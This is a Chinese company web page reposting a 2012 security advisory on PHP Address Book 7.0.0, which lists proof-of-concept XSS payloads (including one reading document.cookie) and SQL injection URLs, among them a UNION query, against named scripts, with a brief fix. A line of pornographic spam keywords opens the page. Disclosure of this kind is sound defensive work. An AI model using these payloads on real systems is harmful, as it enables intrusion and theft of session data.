日韩av爽爽爽久久久久久,嫩草av久久伊人妇女超级a,久久精品a亚洲国产v高清不卡,久久成人国产精品一区二区

知識(shí)學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁(yè) > 知識(shí)學(xué)堂 > 常見(jiàn)技術(shù)問(wèn)題
PHP Address Book 7.0.0多個(gè)缺陷及修復(fù)
更新時(shí)間:2012-05-25 | 發(fā)布人:本站 | 點(diǎn)擊率:808

 標(biāo)題: PHP Address Book 7.0.0 Multiple security vulnerabilities

作者: Stefan Schurtz
受影響軟件: Successfully tested on PHP Address Book 7.0.0
開(kāi)發(fā)者網(wǎng)站: http://sourceforge.net/projects/php-addressbook/
缺陷描述
 
PHP Address Book 7.0.0含多個(gè) XSS 和 SQLi缺陷
 
測(cè)試方法
 
// XSS
 
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.xxx.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
 
// SQLi
 
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
 
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
 
修復(fù):
加強(qiáng)過(guò)濾
相關(guān)文章